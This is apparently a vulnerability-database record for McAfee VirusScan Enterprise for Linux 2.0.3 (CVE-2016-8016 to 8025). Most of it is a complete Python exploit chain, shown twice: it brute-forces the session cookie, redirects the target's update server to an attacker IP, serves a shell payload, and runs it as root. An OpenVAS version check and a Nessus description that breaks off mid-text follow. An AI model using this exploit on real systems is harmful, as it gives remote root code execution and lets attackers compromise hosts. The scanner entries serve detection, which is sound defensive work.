'application/x-www-form-urlencoded'}\r\n r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)\r\n r.raise_for_status()\r\n \r\n pprint(\"Payload executed\", 1)\r\n \r\ndef start_update_server():\r\n \r\n class RequestHandler(BaseHTTPRequestHandler):\r\n def do_HEAD(s):\r\n s.send_response(200)\r\n s.send_header(\"Content-type\", \"text/html\")\r\n s.end_headers()\r\n \r\n def do_GET(s):\r\n if s.path == \"/catalog.z\":\r\n s.send_response(200)\r\n s.send_header(\"Content-type\", \"text/html\")\r\n s.end_headers()\r\n s.wfile.write(bytes(payload, \"utf-8\"))\r\n \r\n pprint(\"Payload placed\", 1)\r\n \r\n payload_in_place.set()\r\n \r\n # Die after sending payload so we send an incomplete response\r\n raise KillServer\r\n \r\n else: # Assume all other requests are for SiteStat - Always increasing version\r\n s.send_response(200)\r\n s.send_header(\"Content-type\", \"text/xml\")\r\n s.end_headers()\r\n s.wfile.write(bytes((\"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\"\"\" \\\r\n \"\"\"<SiteStatus Status=\"Enabled\" 
CatalogVersion=\"2%d\">\"\"\" \\\r\n \"\"\" </SiteStatus>\"\"\") % int(time.time()), \"utf-8\"))\r\n \r\n # Throwing KillServer will shutdown the server ungracefully\r\n class KillServer(Exception):\r\n def __str__(self):\r\n return \"Kill Server (not an error)\"\r\n \r\n # ThreadingMixIn plus support for KillServer exceptions\r\n class AbortableThreadingMixIn(ThreadingMixIn):\r\n def process_request_thread(self, request, client_address):\r\n try:\r\n self.finish_request(request, client_address)\r\n self.shutdown_request(request)\r\n except KillServer:\r\n pprint(\"Killing update server dirtily\")\r\n self.shutdown_request(request)\r\n self.shutdown() # Only if we want to shutdown\r\n except:\r\n self.handle_error(request, client_address)\r\n self.shutdown_request(request)\r\n \r\n \r\n class BackgroundHTTPSrv(AbortableThreadingMixIn, HTTPServer):\r\n pass\r\n \r\n pprint(\"Launching update server\")\r\n \r\n srv = BackgroundHTTPSrv((local_ip, update_server_port), RequestHandler)\r\n threading.Thread(target=srv.serve_forever).start()\r\n \r\n pprint(\"Update server started\", 1)\r\n return srv\r\n \r\n \r\n####################################################################################\r\n####################################################################################\r\n \r\npprint(\"Attacking %s\" % target_domain, 1)\r\n \r\n# Crack the auth cookie\r\ncookie = crack_cookie()\r\nauth_cookie = {\"nailsSessionId\": cookie}\r\n \r\n# Start our update server locally\r\nsrv = start_update_server()\r\n \r\n# Force target to use our update server\r\nupdate_update_server(auth_cookie)\r\n \r\n# Make target download an update from us\r\ndownload_update(auth_cookie)\r\n \r\n# Block until the target downloads our payload,\r\npayload_in_place.wait()\r\n \r\n# Shutdown our update server\r\nsrv.shutdown()\r\n \r\n# Execute /bin/sh -(?) 
catalog.z\r\nexec_catalogz(auth_cookie)\n\n# 0day.today [2018-02-15] #", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/26519"}], "openvas": [{"lastseen": "2019-05-29T18:35:27", "bulletinFamily": "scanner", "description": "McAfee VirusScan Enterprise for Linux is prone to multiple\nvulnerabilities.", "modified": "2018-10-29T00:00:00", "published": "2016-12-14T00:00:00", "id": "OPENVAS:1361412562310106470", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310106470", "title": "McAfee VirusScan Enterprise for Linux Multiple Vulnerabilities", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_mcafee_virusscan_enterprise_lin_mult_vuln.nasl 12149 2018-10-29 10:48:30Z asteins $\n#\n# McAfee VirusScan Enterprise for Linux Multiple Vulnerabilities\n#\n# Authors:\n# Christian Kuersteiner <christian.kuersteiner@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2016 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = 'cpe:/a:mcafee:virusscan_enterprise_for_linux';\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.106470\");\n script_version(\"$Revision: 12149 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-29 11:48:30 +0100 (Mon, 29 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-14 11:28:02 +0700 (Wed, 14 Dec 2016)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n\n script_cve_id(\"CVE-2016-8016\", \"CVE-2016-8017\", \"CVE-2016-8018\", \"CVE-2016-8019\", \"CVE-2016-8020\",\n\"CVE-2016-8021\", \"CVE-2016-8022\", \"CVE-2016-8023\", \"CVE-2016-8024\", \"CVE-2016-8025\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_name(\"McAfee VirusScan Enterprise for Linux Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"This script is Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_mcafee_virusscan_enterprise_detect_lin.nasl\");\n script_mandatory_keys(\"mcafee/virusscan_enterprise_linux/installed\");\n\n script_tag(name:\"summary\", value:\"McAfee VirusScan Enterprise for Linux is prone to multiple\nvulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"McAfee VirusScan Enterprise for Linux is prone to multiple vulnerabilities:\n\n - Remote Unauthenticated File Existence Test (CVE-2016-8016)\n\n - 
Remote Unauthenticated File Read (CVE-2016-8017)\n\n - No Cross-Site Request Forgery Tokens (CVE-2016-8018)\n\n - Cross Site Scripting (CVE-2016-8019)\n\n - Authenticated Remote Code Execution and Privilege Escalation (CVE-2016-8020)\n\n - Web Interface Allows Arbitrary File Write to Known Location (CVE-2016-8021)\n\n - Remote Use of Authentication Tokens (CVE-2016-8022)\n\n - Brute Force Authentication Tokens (CVE-2016-8023)\n\n - HTTP Response Splitting (CVE-2016-8024)\n\n - Authenticated SQL Injection (CVE-2016-8025)\");\n\n script_tag(name:\"impact\", value:\"An unauthenticated attacker may execute code when the vulnerabilities are chained\ntogether.\");\n\n script_tag(name:\"affected\", value:\"Version 2.0.3\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Endpoint Security for Linux (ENSL) 10.2 or later.\");\n\n script_xref(name:\"URL\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10181\");\n script_xref(name:\"URL\", value:\"https://nation.state.actor/mcafee.html\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!version = get_app_version(cpe: CPE, port: port))\n exit(0);\n\nif (version_is_less_equal(version: version, test_version: \"2.0.3\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"Endpoint Security for Linux 10.2\");\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-12-13T18:08:39", "bulletinFamily": "exploit", "description": "McAfee Virus Scan Enterprise for Linux - Remote Code Execution. 
CVE-2016-8016,CVE-2016-8017,CVE-2016-8018,CVE-2016-8019,CVE-2016-8020,CVE-2016-8021,CVE-2016-...", "modified": "2016-12-13T00:00:00", "published": "2016-12-13T00:00:00", "id": "EDB-ID:40911", "href": "https://www.exploit-db.com/exploits/40911/", "type": "exploitdb", "title": "McAfee Virus Scan Enterprise for Linux - Remote Code Execution", "sourceData": "'''\r\nSource: https://nation.state.actor/mcafee.html\r\n\r\nVulnerabilities\r\n\r\nCVE-2016-8016: Remote Unauthenticated File Existence Test\r\nCVE-2016-8017: Remote Unauthenticated File Read (with Constraints)\r\nCVE-2016-8018: No Cross-Site Request Forgery Tokens\r\nCVE-2016-8019: Cross Site Scripting\r\nCVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation\r\nCVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location\r\nCVE-2016-8022: Remote Use of Authentication Tokens\r\nCVE-2016-8023: Brute Force Authentication Tokens\r\nCVE-2016-8024: HTTP Response Splitting\r\nCVE-2016-8025: Authenticated SQL Injection\r\nWhen chaned together, these vulnerabilities allow a remote attacker to execute code as root.\r\n'''\r\n#!/bin/python3\r\nimport time\r\nimport requests\r\nimport os\r\nimport sys\r\nimport re\r\nimport threading\r\nimport subprocess\r\nfrom http.server import BaseHTTPRequestHandler, HTTPServer\r\nfrom socketserver import ThreadingMixIn\r\n\r\n# Per-target configuration\r\ntarget_domain=\"https://10.0.1.130\" # https://target_ip\r\nlocal_ip = '10.0.1.128' # Attacker IP for victim to connect back to\r\nauthorized_ip=\"127.0.0.1\" # IP address cookie will be valid for\r\nupdate_server_port = 8080 # Port update server listens on\r\ndelay_seconds = 10 # How long should the server take to serve the update\r\ntarget_port = 55443 # Port to target\r\n\r\n# Put payload script in payload.sh\r\n\r\n# Initialization\r\npayload_in_place = threading.Event()\r\nrequests.packages.urllib3.disable_warnings()\r\nwith open(\"payload.sh\", \"r\") as f:\r\n payload = f.read()\r\n\r\ndef 
pprint(inp, flag=False):\r\n pad = \"#\"\r\n if flag:\r\n pad = \"*\"\r\n print(\"\\n\" + pad+ \" \" + inp)\r\n\r\n\r\ndef crack_cookie():\r\n pprint(\"Cracking Cookie\")\r\n\r\n # A page that requires authentication\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&tplt=productUpdate.html\"\r\n\r\n # Start at the current time + 100 in case of recent login with clock skew\r\n date_val = int(time.time()+100)\r\n cookie_fmt = authorized_ip+\"/n/0/%d-checksum// \"+authorized_ip + \" \"*20\r\n\r\n # Make requests, print after every 600\r\n while True:\r\n cookie = cookie_fmt % date_val\r\n req_cookie = {\"nailsSessionId\": cookie}\r\n r = requests.get(url, cookies=req_cookie, verify=False)\r\n r.raise_for_status()\r\n\r\n if \"Set-Cookie\" in r.headers:\r\n valid_cookie = cookie\r\n timestamp = cookie.split(\"/\")[3].split(\"-\")[0]\r\n break\r\n\r\n elif date_val % 600 == 0:\r\n print(\"Now trying %s\" % time.asctime(time.localtime(date_val)))\r\n\r\n date_val -= 1\r\n\r\n pprint(\"Cookie Cracked: \" + timestamp, True)\r\n return valid_cookie\r\n\r\n\r\ndef update_update_server(auth_cookie):\r\n pprint(\"Updating update server\")\r\n\r\n # Replace McAfeeHttp update server with attacker local_ip:update_server_port\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&addr=127.0.0.1%3A65443&tplt=\" \\\r\n \"repository.html&sitelist=add&mon%3A0=db+set+1+_table%3Drepository+status%3D1+siteList%3D%253C%253F\" \\\r\n \"xml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%250A%253Cns%253ASiteLists\" \\\r\n \"%2520xmlns%253Ans%253D%2522naSiteList%2522%2520GlobalVersion%253D%2522PATTeELCQSEhZwxKf4PoXNSY4%2Fg%25\" \\\r\n \"3D%2522%2520LocalVersion%253D%2522Wed%252C%252030%2520Dec%25202009%252011%253A20%253A59%2520UTC%2522%2\" \\\r\n \"520Type%253D%2522Client%2522%253E%253CPolicies%2F%253E%253CSiteList%2520Default%253D%25221%2522%2520Na\" \\\r\n 
\"me%253D%2522SomeGUID%2522%253E%253CHttpSite%2520Type%253D%2522repository%2522%2520Name%253D%2522McAfee\" \\\r\n \"Http%2522%2520Order%253D%25221%2522%2520Server%253D%2522\"+local_ip+\"%253A\"+str(update_server_port) \\\r\n + \"%2522%2520Enabled%253D%25221%2522%2520Local%253D%25221%2522%253E%253CRelativePath%2F%253E%253CUseAuth%\" \\\r\n \"253E0%253C%2FUseAuth%253E%253CUserName%253E%253C%2FUserName%253E%253CPassword%2520Encrypted%253D%25220\" \\\r\n \"%2522%2F%253E%253C%2FHttpSite%253E%253CFTPSite%2520Type%253D%2522fallback%2522%2520Name%253D%2522McAfe\" \\\r\n \"eFtp%2522%2520Order%253D%25222%2522%2520Server%253D%2522ftp.nai.com%253A21%2522%2520Enabled%253D%25221\" \\\r\n \"%2522%2520Local%253D%25221%2522%253E%253CRelativePath%253ECommonUpdater%253C%2FRelativePath%253E%253CU\" \\\r\n \"seAuth%253E1%253C%2FUseAuth%253E%253CUserName%253Eanonymous%253C%2FUserName%253E%253CPassword%2520Encr\" \\\r\n \"ypted%253D%25221%2522%253ECommonUpdater%40McAfeeB2B.com%253C%2FPassword%253E%253C%2FFTPSite%253E%253C%\" \\\r\n \"2FSiteList%253E%253C%2Fns%253ASiteLists%253E+_cmd%3Dupdate+&mon%3A1=task+setsitelist&mon%3A2=db+select\" \\\r\n \"+_show%3DsiteList+_show%3Dstatus+_table%3Drepository&info%3A2=multi%2Cshow&reposProperty=repository&re\" \\\r\n \"posProperty=fallback&useOfProxy=on\"\r\n\r\n r = requests.get(url, cookies=auth_cookie, verify=False)\r\n r.raise_for_status()\r\n pprint(\"Updated update server\", True)\r\n\r\ndef download_update(req_cookie):\r\n pprint(\"Requesting target download payload\")\r\n\r\n # Send request to make target download payload\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails\"\r\n\r\n updateName = \"update_%d\" % int(time.time())\r\n postdata = (\"pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&scheduleOp=add&mon%3A0=db+set+1+_tab\" \\\r\n \"le%3Dschedule++taskName%3D{0}+taskType%3DUpdate+taskInfo%3DtoUpdate%3Ddat%253Bengine+timetable%3Dtype%\" \\\r\n 
\"3Dunscheduled+status%3DIdle++i_recurrenceCounter%3D0+&mon%3A1=task+nstart+{0}&mon%3A2=db+select+_asc%3D\" \\\r\n \"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+_sh\" \\\r\n \"ow%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dprogress+\" \\\r\n \"_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offset%3D0&in\" \\\r\n \"fo%3A2=multi%2Cshow&mon%3A3=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A3=multi%2Cshow&loc\" \\\r\n \"%3A4=conf+get+browser.resultsPerPage&info%3A4=multi%2Cshow&mon%3A5=task+updatecrontab&info%3A5=multi%2\" \\\r\n \"Cshow&echo%3A6=1&info%3A6=pageNo&echo%3A7=&info%3A7=selectedTask\"\"\").format(updateName)\r\n\r\n headers = {'Content-Type': 'application/x-www-form-urlencoded'}\r\n r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)\r\n r.raise_for_status()\r\n\r\n pprint(\"Payload download requested\", 1)\r\n\r\n\r\ndef exec_catalogz(req_cookie):\r\n pprint(\"Making target execute payload\")\r\n\r\n #### Get commit_id and ODS_name\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails?pg=proxy&tplt=schedOnDemand.html&addr=127.0\" \\\r\n \".0.1:65443&mon:0=sconf+ODS+select+section%3Dnailsd.profile.ODS&info:0=multi,show,digest&echo:1=ODS&inf\" \\\r\n \"o:1=profileName&mon:2=sconf+ODS+select+section%3Dnailsd.profile.ODS_default&info:2=multi,show&echo:3=O\" \\\r\n \"DS_default&info:3=defaultProfileName&mon:4=sconf+ODS+select+attribute%3Dnailsd.oasEnabled&info:4=multi\" \\\r\n \",show&mon:5=extensions&info:5=multi,show&mon:6=db+select+_show=max(i_taskId)+_table=schedule&info:6=mu\" \\\r\n \"lti,show&mon:7=utco&info:7=single,show,serverUtcOffset&echo:8=generate&info:8=profileNameAction\"\r\n\r\n r = requests.get(url, cookies=req_cookie, verify=False)\r\n r.raise_for_status()\r\n\r\n regex = re.search(\"\\|digest=(.+?)\\|\", r.text)\r\n if not regex:\r\n 
print(\"\\nERROR: Could not get commit_id when generating evil scan\\n\")\r\n return False\r\n\r\n commit_id = regex.groups(1)[0]\r\n\r\n # Send request to start evil scan\r\n payload_path = \"%2Fopt%2FMcAfee%2Fcma%2Fscratch%2Fupdate%2Fcatalog.z\"\r\n binary_path = \"%2Fbin%2Fsh\" # Use \"%2fbin%2Fstatic-sh\" for versions 1.x\r\n\r\n url = target_domain + \":\" + str(target_port) + \"/0409/nails\"\r\n\r\n ODS_name = \"ODS_1\" # This may need to be increased if the name already exists\r\n scan_name = \"scan_%s\" % str(int(time.time()))\r\n\r\n postdata = (\"pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&mon%3A0=sconf+{1}+begin&info%3A0=\" \\\r\n \"multi%2Cshow&mon%3A1=sconf+{1}+delete+{0}+section%3Dnailsd.profile.{1}.filter+section%3Dnailsd.prof\" \\\r\n \"ile.{1}.action&mon%3A2=sconf+{1}+set+{0}+nailsd.profile.{1}.allFiles%3Dtrue+nailsd.profile.{1}.child\" \\\r\n \"InitTmo%3D240+nailsd.profile.{1}.cleanChildren%3D2+nailsd.profile.{1}.cleansPerChild%3D10000+nailsd\" \\\r\n \".profile.{1}.datPath%3D%2Fopt%2FNAI%2FLinuxShield%2Fengine%2Fdat+nailsd.profile.{1}.decompArchive%3\" \\\r\n \"Dtrue+nailsd.profile.{1}.decompExe%3Dtrue+nailsd.profile.{1}.engineLibDir%3D%2Fopt%2FNAI%2FLinuxShi\" \\\r\n \"eld%2Fengine%2Flib+nailsd.profile.{1}.enginePath%3D{3}+nailsd.profile.{1}.factoryI\" \\\r\n \"nitTmo%3D240+nailsd.profile.{1}.heuristicAnalysis%3Dtrue+nailsd.profile.{1}.macroAnalysis%3Dtrue+na\" \\\r\n \"ilsd.profile.{1}.maxQueSize%3D32+nailsd.profile.{1}.mime%3Dtrue+nailsd.profile.{1}.noJokes%3Dfalse+\" \\\r\n \"nailsd.profile.{1}.program%3Dtrue+nailsd.profile.{1}.quarantineChildren%3D1+nailsd.profile.{1}.quar\" \\\r\n \"antineDirectory%3D%2Fquarantine+nailsd.profile.{1}.quarantineFromRemoteFS%3Dfalse+nailsd.profile.{1\" \\\r\n \"}.quarantinesPerChild%3D10000+nailsd.profile.{1}.scanChildren%3D2+nailsd.profile.{1}.scanMaxTmo%3D3\" \\\r\n \"00+nailsd.profile.{1}.scanNWFiles%3Dfalse+nailsd.profile.{1}.scanOnRead%3Dtrue+nailsd.profile.{1}.s\" \\\r\n 
\"canOnWrite%3Dtrue+nailsd.profile.{1}.scannerPath%3D{4}+nailsd.profile.{1}.scansPerChild\" \\\r\n \"%3D10000+nailsd.profile.{1}.slowScanChildren%3D0+nailsd.profile.{1}.filter.0.type%3Dexclude-path+na\" \\\r\n \"ilsd.profile.{1}.filter.0.path%3D%2Fproc+nailsd.profile.{1}.filter.0.subdir%3Dtrue+nailsd.profile.{\" \\\r\n \"1}.filter.1.type%3Dexclude-path+nailsd.profile.{1}.filter.1.path%3D%2Fquarantine+nailsd.profile.{1}\" \\\r\n \".filter.1.subdir%3Dtrue+nailsd.profile.{1}.filter.extensions.mode%3Dall+nailsd.profile.{1}.filter.e\" \\\r\n \"xtensions.type%3Dextension+nailsd.profile.{1}.action.Default.primary%3DClean+nailsd.profile.{1}.act\" \\\r\n \"ion.Default.secondary%3DQuarantine+nailsd.profile.{1}.action.App.primary%3DClean+nailsd.profile.{1}\" \\\r\n \".action.App.secondary%3DQuarantine+nailsd.profile.{1}.action.timeout%3DPass+nailsd.profile.{1}.acti\" \\\r\n \"on.error%3DBlock&mon%3A3=sconf+{1}+commit+{0}&mon%3A4=db+set+{0}+_table%3Dschedule++taskName%3D{2}+\" \\\r\n \"taskType%3DOn-Demand+taskInfo%3DprofileName%3D{1}%2Cpaths%3Dpath%3A%2Ftmp%3Bexclude%3Atrue+timetabl\" \\\r\n \"e%3Dtype%3Dunscheduled+progress%3D+status%3DIdle+&mon%3A5=task+nstart+{2}&mon%3A6=db+select+_asc%3D\" \\\r\n \"taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+\" \\\r\n \"_show%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dpro\" \\\r\n \"gress+_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offs\" \\\r\n \"et%3D0&info%3A6=multi%2Cshow&mon%3A7=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A7=mult\" \\\r\n \"i%2Cshow&mon%3A8=sconf+ODS+begin&info%3A8=multi%2Cshow%2Cdigest&mon%3A9=task+updatecrontab&info%3A9\" \\\r\n \"=multi%2Cshow&loc%3A10=conf+get+browser.resultsPerPage&info%3A10=multi%2Cshow&echo%3A11=1&info%3A11\" \\\r\n \"=pageNo&echo%3A12=&info%3A12=selectedTask\").format(commit_id, ODS_name, scan_name,payload_path, binary_path)\r\n\r\n 
headers = {'Content-Type': 'application/x-www-form-urlencoded'}\r\n r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers)\r\n r.raise_for_status()\r\n\r\n pprint(\"Payload executed\", 1)\r\n\r\ndef start_update_server():\r\n\r\n class RequestHandler(BaseHTTPRequestHandler):\r\n def do_HEAD(s):\r\n s.send_response(200)\r\n s.send_header(\"Content-type\", \"text/html\")\r\n s.end_headers()\r\n\r\n def do_GET(s):\r\n if s.path == \"/catalog.z\":\r\n s.send_response(200)\r\n s.send_header(\"Content-type\", \"text/html\")\r\n s.end_headers()\r\n s.wfile.write(bytes(payload, \"utf-8\"))\r\n\r\n pprint(\"Payload placed\", 1)\r\n\r\n payload_in_place.set()\r\n\r\n # Die after sending payload so we send an incomplete response\r\n raise KillServer\r\n\r\n else: # Assume all other requests are for SiteStat - Always increasing version\r\n s.send_response(200)\r\n s.send_header(\"Content-type\", \"text/xml\")\r\n s.end_headers()\r\n s.wfile.write(bytes((\"\"\"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\"\"\" \\\r\n \"\"\"<SiteStatus Status=\"Enabled\" CatalogVersion=\"2%d\">\"\"\" \\\r\n \"\"\" </SiteStatus>\"\"\") % int(time.time()), \"utf-8\"))\r\n\r\n # Throwing KillServer will shutdown the server ungracefully\r\n class KillServer(Exception):\r\n def __str__(self):\r\n return \"Kill Server (not an error)\"\r\n\r\n # ThreadingMixIn plus support for KillServer exceptions\r\n class AbortableThreadingMixIn(ThreadingMixIn):\r\n def process_request_thread(self, request, client_address):\r\n try:\r\n self.finish_request(request, client_address)\r\n self.shutdown_request(request)\r\n except KillServer:\r\n pprint(\"Killing update server dirtily\")\r\n self.shutdown_request(request)\r\n self.shutdown() # Only if we want to shutdown\r\n except:\r\n self.handle_error(request, client_address)\r\n self.shutdown_request(request)\r\n\r\n\r\n class BackgroundHTTPSrv(AbortableThreadingMixIn, HTTPServer):\r\n pass\r\n\r\n pprint(\"Launching update 
server\")\r\n\r\n srv = BackgroundHTTPSrv((local_ip, update_server_port), RequestHandler)\r\n threading.Thread(target=srv.serve_forever).start()\r\n\r\n pprint(\"Update server started\", 1)\r\n return srv\r\n\r\n\r\n####################################################################################\r\n####################################################################################\r\n\r\npprint(\"Attacking %s\" % target_domain, 1)\r\n\r\n# Crack the auth cookie\r\ncookie = crack_cookie()\r\nauth_cookie = {\"nailsSessionId\": cookie}\r\n\r\n# Start our update server locally\r\nsrv = start_update_server()\r\n\r\n# Force target to use our update server\r\nupdate_update_server(auth_cookie)\r\n\r\n# Make target download an update from us\r\ndownload_update(auth_cookie)\r\n\r\n# Block until the target downloads our payload,\r\npayload_in_place.wait()\r\n\r\n# Shutdown our update server\r\nsrv.shutdown()\r\n\r\n# Execute /bin/sh -(?) catalog.z\r\nexec_catalogz(auth_cookie)", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/40911/"}], "nessus": [{"lastseen": "2019-11-17T18:54:16", "bulletinFamily": "scanner", "description": "The remote host has a version of McAfee VirusScan Enterprise for Linux\n(VSEL) installed that is prior or equal to 2.0.3. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n web interface due to improper error reporting. 
An\n authenticated, remote attacker can exploit this, by\n manipulating the ", "modified": "2019-11-02T00:00:00", "id": "MCAFEE_VSEL_SB10181.NASL", "href": "https://www.tenable.com/plugins/nessus/95812", "published": "2016-12-14T00:00:00", "title": "McAfee VirusScan Enterprise for Linux <= 2.0.3 Multiple vulnerabilities (SB10181)", "type": "nessus", "sourceData": "#TRUSTED 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\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(95812);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2016-8016\",\n \"CVE-2016-8017\",\n \"CVE-2016-8018\",\n \"CVE-2016-8019\",\n \"CVE-2016-8020\",\n \"CVE-2016-8021\",\n \"CVE-2016-8022\",\n \"CVE-2016-8023\",\n \"CVE-2016-8024\",\n \"CVE-2016-8025\"\n );\n script_bugtraq_id(94823);\n script_xref(name:\"MCAFEE-SB\", value:\"SB10181\");\n script_xref(name:\"CERT\", value:\"245327\");\n script_xref(name:\"EDB-ID\", value:\"40911\");\n\n script_name(english:\"McAfee VirusScan Enterprise for Linux <= 2.0.3 Multiple vulnerabilities (SB10181)\");\n script_summary(english:\"Checks VSEL version\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee VirusScan Enterprise for Linux\n(VSEL) installed that is prior or equal to 2.0.3. It is, therefore,\naffected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists in the\n web interface due to improper error reporting. An\n authenticated, remote attacker can exploit this, by\n manipulating the 'tplt' parameter, to disclose filenames\n on the system. (CVE-2016-8016)\n\n - An information disclosure vulnerability exists in the\n parser due to improper handling of template files. 
An\n authenticated, remote attacker can exploit this, via\n specially crafted text elements, to disclose the\n contents of arbitrary files subject to the privileges of\n the 'nails' account. (CVE-2016-8017)\n\n - Multiple cross-site request forgery (XSRF)\n vulnerabilities exist in the web interface due to a\n failure to require multiple steps, explicit\n confirmation, or a unique token when performing certain\n sensitive actions. An unauthenticated, remote attacker\n can exploit these vulnerabilities, by convincing a user\n to follow a specially crafted link, to execute arbitrary\n script code or commands in a user's browser session.\n (CVE-2016-8018)\n\n - Multiple cross-site scripting (XSS) vulnerabilities\n exist due to improper validation of user-supplied input\n to the 'info:7' and 'info:5' parameters when the 'tplt'\n parameter is set in NailsConfig.html or\n MonitorHost.html. An unauthenticated, remote attacker\n can exploit these vulnerabilities, via a specially\n crafted request, to execute arbitrary script code in a\n user's browser session. (CVE-2016-8019)\n\n - A remote code execution vulnerability exists due to\n improper validation of user-supplied input to the\n 'nailsd.profile.ODS_9.scannerPath' variable in the last\n page of the system scan form. An authenticated, remote\n attacker can exploit this, via a specially crafted HTTP\n request, to execute arbitrary code as the root user.\n (CVE-2016-8020)\n\n - A remote code execution vulnerability exists in the web\n interface when downloading update files from a specified\n update server due to a race condition. An authenticated,\n remote attacker can exploit this to place and execute a\n downloaded file before integrity checks are completed.\n (CVE-2016-8021)\n\n - A security bypass vulnerability exists in the web\n interface due to improper handling of authentication\n cookies. 
The authentication cookie stores the IP address \n of the client and is checked to ensure it matches the\n IP address of the client sending it; however, an \n unauthenticated, remote attacker can cause the cookie to\n be incorrectly parsed by adding a number of spaces to\n the IP address stored within the cookie, resulting in a\n bypass of the security mechanism. (CVE-2016-8022)\n\n - A security bypass vulnerability exists in the web\n interface due to improper handling of the nailsSessionId\n authentication cookie. An unauthenticated, remote\n attacker can exploit this, by brute-force guessing the\n server start authentication token within the cookie, to\n bypass authentication mechanisms. (CVE-2016-8023)\n\n - An HTTP response splitting vulnerability exists due to\n improper sanitization of carriage return and line feed\n (CRLF) character sequences passed to the 'info:0'\n parameter before being included in HTTP responses. An\n authenticated, remote attacker can exploit this to\n inject additional headers in responses and disclose\n sensitive information. (CVE-2016-8024)\n\n - A SQL injection (SQLi) vulnerability exists in the web\n interface due to improper sanitization of user-supplied\n input to the 'mon:0' parameter. 
